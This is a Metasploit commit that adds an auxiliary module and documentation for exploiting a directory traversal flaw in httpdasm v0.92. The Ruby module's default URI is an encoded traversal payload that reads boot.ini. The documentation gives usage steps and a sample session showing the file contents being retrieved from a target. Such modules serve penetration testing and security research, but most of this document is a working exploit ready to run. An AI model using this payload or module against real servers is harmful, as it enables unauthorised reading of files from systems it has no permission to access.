Land #10183, Add auxiliary mod to exploit httpdasm dir traversal vuln

4.x
Wei Chen 2018-06-19 14:56:36 -05:00 committed by Metasploit
parent 5998896b48
commit 17c0bc1fa7
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 85 additions and 0 deletions

View File

@ -0,0 +1,34 @@
## Description
This module exploits a directory traversal vulnerability to read files from a server running httpdasm v0.92.
## Vulnerable Application
httpdasm 0.92
## Verification Steps
1. Start `msfconsole`
2. `use [auxiliary/scanner/http/httpdasm_directory_traversal]`
3. `set RHOSTS [IP]`
4. `run`
## Scenarios
### Tested on Windows XP x86
```
msf5 > use auxiliary/scanner/http/httpdasm_directory_traversal
msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > set rhosts 192.168.37.128
rhosts => 192.168.37.128
msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > run
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/httpdasm_directory_traversal) >
```

View File

@ -0,0 +1,51 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Httpdasm Directory Traversal',
'Description' => %q{
This module allows for traversing the file system of a host running httpdasm v0.92.
},
'Author' =>
[
'John Leitch', # EDB POC
'Shelby Pace' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '15861']
]
))
register_options(
[
OptString.new('TARGETURI', [true, 'Path to traverse to', '%2e%2e%5c' * 8 + 'boot.ini'])
])
end
def run
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
if res && res.code == 200
print_status(res.body)
path = store_loot('httpdasm.file', 'application/octet-stream', rhost, res.body)
else
if res
print_error("Unexpected response from server: #{res.code}")
else
print_error("The server timed out.")
end
end
end
end